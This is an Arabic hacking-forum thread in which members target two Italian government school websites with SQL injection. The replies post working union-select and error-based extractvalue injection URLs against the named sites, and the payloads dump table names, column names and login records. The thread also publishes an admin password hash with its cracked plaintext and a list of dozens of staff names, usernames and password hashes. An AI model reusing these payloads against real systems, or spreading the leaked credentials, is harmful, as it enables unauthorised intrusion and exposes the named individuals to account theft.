:: vBspiders Professional Network :: - موقعين حكوميه gov مصآبه بثغرة SQL

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)

- - موقعين حكوميه gov مصآبه بثغرة SQL (http://www.vbspiders.com/vb/t62513.html)

موقعين حكوميه gov مصآبه بثغرة SQL

السلآم عليكم ورحمة الله وبركاته

آخبآركم إن شآء آلله تمام :/~

آلمهم

اليوم معاي موقعين حكوميه اجنبيه مصابه بثغرة SQL

كل الي عليكم تحقنوه بالهافج او يدوي ^_^

بششوف الاندكسسس ع الموقع،

الاول

http://www.itcpantaleo.gov.it/webschool3/page.php?id=26

الثاني

http://www.donmilaninapoli.gov.it/we...ge.php?id=2%27

تحيآتي لكم،

لآتنسوون التقيم

:in_love:

رد: موقعين حكوميه gov مصآبه بثغرة SQL

لقد قيمة الموضوع ب 5 نجوم
برك الله فيك
:)

رد: موقعين حكوميه gov مصآبه بثغرة SQL

شكرآ لك ،

ننتضر بآقي الآخوه ليحقنووه~

:bleh:

رد: موقعين حكوميه gov مصآبه بثغرة SQL

مشكور اخي تم القييم ..

رد: موقعين حكوميه gov مصآبه بثغرة SQL

مشكورر جدا
جأأأري الحقن
+ تقيم

رد: موقعين حكوميه gov مصآبه بثغرة SQL

السلام عليكم

مشكور اخي الكريم لكني لم استطع اظهار الاعدمة المصاااابه

هلكنيييييييي

ممكن مساعده

رد: موقعين حكوميه gov مصآبه بثغرة SQL

آستعمل برنامج الهافج،

يفي بالغرض

رد: موقعين حكوميه gov مصآبه بثغرة SQL

اقتباس:

المشاركة الأصلية كتبت بواسطة qasim (المشاركة 437230)

السلام عليكم

مشكور اخي الكريم لكني لم استطع اظهار الاعدمة المصاااابه

هلكنيييييييي

ممكن مساعده

كود PHP:

   http://www.itcpantaleo.gov.it/webschool3/page.php?id=26+and+1=2+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14

Warning: dir(_pagine/5.1.48-community) [function.dir]: failed to open dir: No error in C:\Inetpub\vhosts\itcpantaleo.gov.it\httpdocs\webs chool3\page.php on line 11

رد: موقعين حكوميه gov مصآبه بثغرة SQL

اقتباس:

المشاركة الأصلية كتبت بواسطة qasim (المشاركة 437230)

السلام عليكم

مشكور اخي الكريم لكني لم استطع اظهار الاعدمة المصاااابه

هلكنيييييييي

ممكن مساعده

Use Xpath injection

كود PHP:

   http://www.itcpantaleo.gov.it/webschool3/page.php?id=26%20and%20extractvalue%28rand%28%29,concat%280x3a,version%28%29%29%29--

رد: موقعين حكوميه gov مصآبه بثغرة SQL

اخي الكريم اعتقد طريقتك في الحقن لم تظهر الاعمدة

رد: موقعين حكوميه gov مصآبه بثغرة SQL

اقتباس:

المشاركة الأصلية كتبت بواسطة qasim (المشاركة 437313)

اخي الكريم اعتقد طريقتك في الحقن لم تظهر الاعمدة

كود PHP:

   http://www.itcpantaleo.gov.it/webschool3/page.php?id=26%20and%20extractvalue%28rand%28%29,concat%280x3a,%28select%20substr%28group_concat%28table_name%29,1,150%29%20from%20information_schema.columns%20where%20table_schema%20like%20database%28%29%20and%20column_name%20like%200x257061737325%29%29%29--

errore query
XPATH syntax error: ':login' SELECT * FROM pagine_istituzionali WHERE id=26 and extractvalue(rand(),concat(0x3a,(select substr(group_concat(table_name),1,150) from information_schema.columns where table_schema like database() and column_name like 0x257061737325)))--

كود PHP:

   http://www.itcpantaleo.gov.it/webschool3/page.php?id=26%20and%20extractvalue%28rand%28%29,concat%280x3a,%28select%20substr%28group_concat%28column_name%29,1,150%29%20from%20information_schema.columns%20where%20table_schema%20like%20database%28%29%20and%20table_name%20like%200x6c6f67696e%29%29%29--

XPATH syntax error: ':id,nome,cognome,username,locks,' SELECT * FROM pagine_istituzionali WHERE id=26 and extractvalue(rand(),concat(0x3a,(select substr(group_concat(column_name),1,150) from information_schema.columns where table_schema like database() and table_name like 0x6c6f67696e)))--

لووللووللوول

رد: موقعين حكوميه gov مصآبه بثغرة SQL

الموقع الاول لم يظهر اي يوسر في جدول login

الثاني الحقنه كلمه

:msn-wink:

كود:

http://www.donmilaninapoli.gov.it/webschool3/page.php?id=2%27

الحقنه كامله:biggrin:

كود:

http://www.donmilaninapoli.gov.it/webschool3/page.php?id=26%20and%201=0%20union%20%20select%201,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14%20from%20login--%20-

رد: موقعين حكوميه gov مصآبه بثغرة SQL

تسلم اخي على الموضوع الجميل واشكر كل الاخوه الكرام

كود:

1:admin:bd199122f85702ae6160608988bdc808

بعد فك الهاش

كود:

admin:settere

تحياتي

رد: موقعين حكوميه gov مصآبه بثغرة SQL

اقتباس:

المشاركة الأصلية كتبت بواسطة KOOBAN (المشاركة 437438)

الموقع الاول لم يظهر اي يوسر في جدول login

الثاني الحقنه كلمه

:msn-wink:

كود:

http://www.donmilaninapoli.gov.it/webschool3/page.php?id=2%27

الحقنه كامله:biggrin:

كود:

http://www.donmilaninapoli.gov.it/webschool3/page.php?id=26%20and%201=0%20union%20%20select%201,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14%20from%20login--%20-

تفضل ياغالى اليوزرات التى لم تظهر هذه بعض منها

الاى دى الباسورد اليوزر الاسم
24 Emilia alesio 1e48c4420b7073bc11916c6c1de226bb
25 Elena aponte b59c67bf196a4758191e42f76670ceba
27 Giuseppina azzurro f09696910bdd874a99cd74c8f05b5c44
29 Silvia bianchini 962e56a8a0b0420d87272a682bfd1e53
30 Maura bianco bc7316929fe1545bf0b98d114ee3ecb8
31 Agnese borrelli 7a674153c63cff1ad7f0e261c369ab2c
33 Antonio canonico f5c3dd7514bf620a1b85450d2ae374b1
35 Maurizio casa 8c8a58fa97c205ff222de3685497742c
36 Grazia caso 7b7a53e239400a13bd6be6c91c4f6c4e
37 Rosalba caso 02b1be0d48924c327124732726097157
40 Fulvia costa 934b535800b1cba8f96a5d72f72f1611
41 Immacolata cozzuto 149815eb972b3c370dee3b89d645ae14
43 Scipione cuomo 4a06d868d044c50af0cf9bc82d2fc19f
44 Immacolata De falco e354fd90b2d5c777bfec87a352a18976
45 Caterina delutio 23fc4cba066f390a8cc729c7592b6ee8
46 Sebastiano de marco b139aeda1c2914e3b579aafd3ceeb1bd
48 Geltrude de simone a36b0dcd1e6384abc0e1867860ad3ee3
49 Concetta devero 2d95666e2649fcfc6e3af75e09f5adb9
51 Maria esposito 263bce650e68ab4e23f28263760b9fa5
52 Anna ferrajolo a70f9e38ff015afaa9ab0aacabee2e13
53 Francesca ferri 3477402667742da39c8e93bf4f30b271
55 Paola fusco 72a86026abb289634ec64d7f3b544f0c
57 Patrizia giattanasio cfbbb8ce992d24f8d26617e22c07d6fe
58 Anna granato a70f9e38ff015afaa9ab0aacabee2e13
59 Maria Fabrizia guarino 8abf419fcef69281e3909f7424c4af03
60 Giustina iannone 7530a42d2ccebf2a5b7f43568d8573d0
62 Concetta indaco a58a98816ffc43099ae660ebc0365abe
63 Assunta izzo 2c6fa11f02e51e34eac73cc8ec8a57ad
64 Mariarosaria izzo 7e61b7571008e74d360ac686c6db1e8d
65 Raffaele langella 4cf34194f97afa90c0626574e99bfec7
66 Giorgio leboffe 16cdae1dc8f5ccc69c51eea2851bff68
67 Maria Rosaria maniscalco 7e61b7571008e74d360ac686c6db1e8d
68 Maria manzo 263bce650e68ab4e23f28263760b9fa5
69 Giuseppe massa 353f9bfab2d01dbb1db343fdaf9ab02e
70 Silvana mastantuoni f850bce37f95a998a2362e26062e7a22
71 Delia mayer 83007ab0b22d51bc6cfa53fc21787257
72 Mariapia metallo 6b5951a358274be48be5cbdabf8ff977
73 Maria Nicol***65533; cbc19b07662418d5f14cc55657295924
75 Irene Paglia 79ae3e10d1ff66922e58d98656315b9e
76 Giuliana Palamara ec6e19a71680aa897db43ffa36d8baf1
77 Valentina Valentina 1aacaa980b66773fe2a67c46e97fc210
78 Raffaela pennone 8bffd9226ca74af58d20791196ead377
79 Adreana Pesapane b9ac3423de2379714f166f7234eaf87b
80 Luigi Polito 8f58fe78bf209813d552e92f68d24974
81 Francesca Porrini a0feba9dc04f522dbed2d9b41d431e07
82 Mariarosaria Renzullo c2e53c4b39b777d6e08170aefa72423c
83 Giuditta Restaino 08df747e8a01a9dc013745d308bac722
84 Cosima Rizzo 9181624171ae17caa68405cdef676e17
86 Anna Russo 97a9d330e236c8d067f01da1894a5438
87 Lucia Russo 8a2efc47e17952c1ea90c9cee4ba38ec
88 Claudia Sabatano bb07c989b57c25fd7e53395c3e118185
89 Maria Sabelli cbc19b07662418d5f14cc55657295924
90 Adele Santoro a5c59c0315098e6d67bb57610f7fb9b1
92 Tommaso Sellaroli 18afc702f269a2774a6e1d970c1c61b0
93 Elvira Simonetti 5bcc926bb6e944243b919a7cf831d417
94 Maria Sorrese cbc19b07662418d5f14cc55657295924
95 Saverio Stornaiuolo 9b69a679aec0597785018c8403c9adf4
96 Giovanna Storto a0a7d2b788a3198f3f7c45e45c9a4de3
97 Loredana Tammaro ddf4cc5c232d3ba10dd0d504e9d78d95
98 Concetta Tene 55c5dd1c8047a163606d6d2bd090c446
99 Massimo Tortorelli 3deb4c86aec7f7b7ccb93e20d0d7d6f5
100 Achille Troilo bcd2f035521796a5545eb66d9e15dffc
101 Antonio Turitto 885383f16fccd10370814fcd862aa10d

رد: موقعين حكوميه gov مصآبه بثغرة SQL

مشكوووووووووووووووووووور